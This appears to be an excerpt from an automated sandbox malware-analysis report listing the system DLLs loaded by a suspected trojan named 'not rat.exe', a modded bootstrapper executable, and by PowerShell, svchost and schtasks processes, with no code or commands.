                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: avicap32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: elstrans.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
